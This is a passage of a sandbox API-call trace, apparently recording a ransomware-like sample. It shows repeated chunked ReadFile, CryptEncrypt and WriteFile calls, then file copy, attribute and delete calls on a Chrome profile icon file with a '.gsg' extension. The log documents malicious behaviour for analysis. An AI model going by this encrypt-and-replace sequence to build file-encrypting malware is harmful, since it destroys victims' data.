lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.615] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.615] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.615] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.615] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.615] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.616] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.616] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.616] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.616] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.616] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.616] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.616] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.616] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.616] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.616] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.616] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.616] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.617] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.617] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.617] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.617] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.617] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.617] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.617] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.617] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.617] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.617] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.617] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.617] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.618] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.618] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.618] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.618] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.618] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.618] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.618] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.618] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.618] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.618] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.618] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.618] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.618] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.619] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.619] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.619] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.619] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.619] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.619] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.619] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.619] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.619] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.619] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.619] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.619] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.619] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.619] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.620] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.620] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.620] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.620] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.620] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.620] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.620] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.620] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.620] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.620] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.620] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.620] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.621] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.621] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.621] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.621] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.621] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.621] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.621] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.621] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.621] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.621] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.621] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.621] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.621] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.622] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.622] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.622] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.622] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.622] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.622] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.622] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.622] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.622] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.622] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.622] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.622] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.622] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x380) returned 1 [0265.622] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x380, lpOverlapped=0x0) returned 1 [0265.623] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c730*=0x2f6, lpOverlapped=0x0) returned 1 [0265.623] CryptEncrypt (in: hKey=0x2e7e9c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x2f6, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c730*=0x300) returned 1 [0265.623] WriteFile (in: hFile=0x5d40, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x2b9c730, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c730*=0x300, lpOverlapped=0x0) returned 1 [0265.623] CloseHandle (hObject=0x5d50) returned 1 [0265.623] CloseHandle (hObject=0x5d40) returned 1 [0265.623] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\google docs.ico"), bFailIfExists=0) returned 1 [0265.631] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\Google Docs.ico", dwFileAttributes=0x0) returned 1 [0265.632] DeleteFileA 